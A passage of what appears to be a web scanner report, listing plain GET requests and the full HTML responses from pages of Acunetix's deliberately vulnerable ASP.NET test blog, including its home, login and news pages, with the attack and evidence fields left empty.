title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 324 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 322 bytes.	GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13421
Response Body - size: 13,421 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 349 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 22839
Response Body - size: 22,839 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 